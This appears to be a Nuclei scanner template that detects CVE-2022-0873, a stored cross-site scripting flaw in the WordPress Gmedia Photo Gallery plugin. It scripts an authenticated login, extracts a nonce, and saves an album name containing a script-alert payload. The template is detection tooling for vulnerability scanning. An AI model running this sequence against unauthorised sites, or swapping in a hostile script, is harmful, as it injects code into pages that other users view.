WordPress Gmedia Photo Gallery Plugin < 1.20.0 - Cross-Site Scripting

id: CVE-2022-0873

info:
  name: WordPress Gmedia Photo Gallery Plugin < 1.20.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Gmedia Photo Gallery WordPress plugin before 1.20.0 does not sanitise and escape the album's name before outputting it in pages or posts with a media embed, which could allow high privilege users such as admin to perform Cross-Site Scripting (XSS) attacks even when the unfiltered-html capability is disallowed. (CVE-2022-0873)
  impact: |
    Successful exploitation could allow an attacker with high privileges, such as admin, to inject arbitrary JavaScript or HTML in the context of other users who view affected posts and pages, potentially leading to session hijacking, defacement, or other malicious actions.
  remediation: |
    Update the Gmedia Photo Gallery plugin to version 1.20.0 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d5ce4b8a-9aa5-4df8-b521-c2105990a87e
    - https://wordpress.org/plugins/grand-media/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0873
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2022-0873
    epss-score: 0.00854
    epss-percentile: 0.53685
    cwe-id: CWE-79
    cpe: cpe:2.3:a:codeasily:gmedia_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: codeasily
    product: gmedia_gallery
    framework: wordpress
  tags: cve,cve2022,wp,wordpress,wp-plugin,gmedia,xss,authenticated

variables:
  string: "{{rand_base(4)}}"
  payload: "{{string}}'><script>alert(document.domain)</script>"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=GrandMedia_Albums HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin.php?page=GrandMedia_Albums HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        term[name]={{payload}}&term[description]=&term[meta][_orderby]=ID&term[meta][_order]=DESC&term[meta][_module_preset]=&term[global]=1&term[status]=publish&_wp_original_http_referer={{BaseURL}}/wp-admin/admin.php?page=GrandMedia_AddMedia&_wpnonce_terms={{nonce}}&_wp_http_referer=/wp-admin/admin.php?page=GrandMedia_Albums&term[taxonomy]=gmedia_album&gmedia_album_save=

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "<script>alert(document.domain)</script>` successfully saved"

      - type: word
        part: content_type_3
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        part: body_2
        group: 1
        regex:
          - 'name="_wpnonce_terms" value="([a-z0-9]+)"'
        internal: true
# digest: 490a00463044022019925a72ccad211afb9bc93cac53a595cdd4fbbbdc76f11247ed90fd49c29847022070e230cda551485ec0139d7c3568e982ca07baa941f94f59c5c9a89a77dd3060:922c64590222798bb761d5b6d8e72950